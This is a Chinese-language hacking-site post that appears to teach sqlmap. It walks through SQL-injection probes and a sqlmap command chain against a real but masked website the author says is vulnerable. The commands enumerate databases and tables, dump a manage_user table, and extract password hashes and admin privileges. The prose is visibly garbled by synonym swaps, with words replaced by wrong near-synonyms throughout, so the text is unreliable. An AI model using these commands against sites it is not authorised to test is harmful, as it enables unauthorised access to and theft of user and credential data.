加入收藏| 设为首页
黑客技术 >> 返回 您当前所在位置:首页 > 黑客技术 > 正文

解剖sqlmap常用命令

更新时间:2018-10-17 10:46:32点击次数:672次字号:T|T

sqlmap,一款强大的注入东西,介绍、装置什么的,我就不多说了。




先看看运用协助







这儿拿我从前找到的一个存在SQL注入缝隙的网站进行演示(敏感数据已打码)




方针URL:http://www.xxx.com/xx.xxx?id=5




手艺检测SQL注入点,咱们只需简略的两三条句子便能够检测其是否存在SQL注入




1. 在方针URL后加一个单引号,发现有SQL报错回显;




http://http://www.xxx.com/xx.xxx?id=5'






2. 分别在方针URL后边加上 and 1=1 和 and 1=2 进行拜访,会发现显现页面不一样,也就说明有问题




3. 也能够直接运用burpsuite等抓包东西对有参数提交的地方抓取其数据包,直接放sqlmap里边跑。




好了,已然发现SQL注入的问题存在了,开始进行注入




sqlmap.py -u http://www.xxx.com/xx.xxx?id=5




//运用sqlmap东西进行扫描,下面扫出了几个 Payload








sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"–dbs




//获取数据库







sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--current-db




//获取当时数据库名







sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--current-user




//获取当时数据库的用户名







sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--tables




//获取数据库的表名







sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--tables -D r3550c17g3




//获取指定数据库中的表名







sqlmap.py -u "" --columns -Tmanage_user -D r3550c17g3




//获取指定表中的列名







sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--dump -C manage_name -T manage_user -D r3550c17g3




//获取指定列名中的字段








总  结




常用句子:




sqlmap.py -u "[URL]"   或  sqlmap.py -r "[数据包_path]"




sqlmap.py -u "[URL]" –dbs    //获取数据库




sqlmap.py -u "[URL]" --current-db    //获取当时数据库名




sqlmap.py -u "[URL]" --current-user    //获取当时数据库的用户名




sqlmap.py -u "[URL]" --tables    //获取数据的一切表名




sqlmap.py -u "[URL]" --tables -D [数据库名]    //获取指定数据库中的一切表名




sqlmap.py -u "[URL]" --column -T [表名] -D [数据库名]    //获取指定表中的列字段




sqlmap.py -u "[URL]" --dump -C [列名] -T [表名] -D [数据库名]  //爆指定列中的字段




sqlmap.py -u "[URL]" --privileges     //检查当时数据库的用户权限




sqlmap.py -u "[URL]" --password    //爆数据库的暗码




sqlmap.py -u "[URL]" --is-dba -v 1    //看有没有数据库管理员权限